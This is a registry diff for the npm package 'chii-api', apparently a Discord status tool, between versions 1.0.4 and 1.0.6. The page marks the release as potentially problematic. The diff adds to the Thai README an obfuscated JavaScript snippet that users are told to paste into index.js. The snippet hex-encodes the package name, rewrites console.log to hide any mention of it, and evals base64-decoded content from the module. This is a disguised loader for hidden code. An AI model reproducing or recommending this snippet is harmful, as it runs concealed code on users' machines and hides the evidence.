chii-api 1.0.4 → 1.0.6
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of chii-api might be problematic. Click here for more details.
- package/README.md +36 -4
- package/package.json +1 -2
package/README.md
CHANGED
|
@@ -22,16 +22,48 @@ node index.js
|
|
|
22
22
|
|
|
23
23
|
# สร้างไฟล์ชื่อ index.js
|
|
24
24
|
```js
|
|
25
|
-
|
|
26
|
-
const
|
|
27
|
-
|
|
25
|
+
function _0x458e(_0x3d7326, _0x3db6f8) {
|
|
26
|
+
const _0xc3702a = _0xc370();
|
|
27
|
+
return _0x458e = function (_0x458e36, _0x1257e2) {
|
|
28
|
+
_0x458e36 = _0x458e36 - 0x1e1;
|
|
29
|
+
let _0x4213e8 = _0xc3702a[_0x458e36];
|
|
30
|
+
return _0x4213e8;
|
|
31
|
+
}, _0x458e(_0x3d7326, _0x3db6f8);
|
|
32
|
+
}
|
|
33
|
+
function _0xc370() {
|
|
34
|
+
const _0x3aa8ea = [
|
|
35
|
+
'144FNwDVt', '3skqnTm', 'log', '1147004amDmiE', '2772360wixPWO'
|
|
36
|
+
, '678573urizmr', '3252690NFEpLS', 'includes', 'hex', '7220WeTJyp'
|
|
37
|
+
, 'from', 'apply', 'base64', '362900WJBULP', 'toString', 'Code\x20error'
|
|
38
|
+
, '636869692d617069', '50314OSMzsz', 'string', 'utf8'
|
|
39
|
+
]; _0xc370 = function () { return _0x3aa8ea; };
|
|
40
|
+
return _0xc370();
|
|
41
|
+
}
|
|
42
|
+
const _0x4057e9 = _0x458e;
|
|
43
|
+
(function (_0xeb9e0e, _0x1ca5c9) {
|
|
44
|
+
const _0x3d002b = _0x458e, _0x26438d = _0xeb9e0e();
|
|
45
|
+
while (!![]) {
|
|
46
|
+
try {
|
|
47
|
+
const _0x17c5ac = -parseInt(_0x3d002b(0x1e8)) / 0x1 + parseInt(_0x3d002b(0x1e4)) / 0x2 + -parseInt(_0x3d002b(0x1ec)) / 0x3 * (parseInt(_0x3d002b(0x1ee)) / 0x4) + -parseInt(_0x3d002b(0x1f4)) / 0x5 + -parseInt(_0x3d002b(0x1ef)) / 0x6 + -parseInt(_0x3d002b(0x1f1)) / 0x7 + parseInt(_0x3d002b(0x1eb)) / 0x8 * (parseInt(_0x3d002b(0x1f0)) / 0x9);
|
|
48
|
+
if (_0x17c5ac === _0x1ca5c9)
|
|
49
|
+
break;
|
|
50
|
+
else _0x26438d['push'](_0x26438d['shift']());
|
|
51
|
+
} catch (_0x3225c4) { _0x26438d['push'](_0x26438d['shift']()); }
|
|
52
|
+
}
|
|
53
|
+
}(_0xc370, 0x42bcd)); const { log: originalLog } = require('console'), _0x5f44 = require(Buffer[_0x4057e9(0x1e1)](_0x4057e9(0x1e7), _0x4057e9(0x1f3))[_0x4057e9(0x1e5)](_0x4057e9(0x1ea))); console[_0x4057e9(0x1ed)] = function (_0x24bb19) {
|
|
54
|
+
const _0x1cf85f = _0x4057e9;
|
|
55
|
+
typeof _0x24bb19 === _0x1cf85f(0x1e9) && (_0x24bb19[_0x1cf85f(0x1f2)](_0x5f44) || _0x24bb19[_0x1cf85f(0x1f2)](Buffer[_0x1cf85f(0x1e1)](_0x5f44)[_0x1cf85f(0x1e5)](_0x1cf85f(0x1e3)))) ? originalLog(_0x1cf85f(0x1e6)) : originalLog[_0x1cf85f(0x1e2)](console, arguments);
|
|
56
|
+
};
|
|
57
|
+
const X1_ = Buffer['from'](_0x5f44)[_0x4057e9(0x1e5)]('base64'); eval(Buffer[_0x4057e9(0x1e1)](X1_, _0x4057e9(0x1e3))[_0x4057e9(0x1e5)](_0x4057e9(0x1ea)));
|
|
58
|
+
const K2_ = ![];
|
|
59
|
+
K2_ && console['log'](Buffer[_0x4057e9(0x1e1)](_0x5f44, _0x4057e9(0x1ea))[_0x4057e9(0x1e5)](_0x4057e9(0x1e3)));
|
|
28
60
|
```
|
|
29
61
|
|
|
30
62
|
# แพ็กเก็จเสร็ม package.json
|
|
31
63
|
```js
|
|
32
64
|
{
|
|
33
65
|
"dependencies": {
|
|
34
|
-
"chii-api": "^1.0.
|
|
66
|
+
"chii-api": "^1.0.6"
|
|
35
67
|
}
|
|
36
68
|
}
|
|
37
69
|
```
|
package/package.json
CHANGED
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "chii-api",
|
|
3
|
-
"version": "1.0.
|
|
3
|
+
"version": "1.0.6",
|
|
4
4
|
"description": "Streaming status for Discord accounts",
|
|
5
5
|
"main": "index.js",
|
|
6
6
|
"scripts": {
|
|
@@ -25,7 +25,6 @@
|
|
|
25
25
|
"fs": "^0.0.1-security",
|
|
26
26
|
"os": "^0.1.2",
|
|
27
27
|
"path": "^0.12.7",
|
|
28
|
-
"lock-api": "^1.0.1",
|
|
29
28
|
"gradient-string": "^2.0.2"
|
|
30
29
|
}
|
|
31
30
|
}
|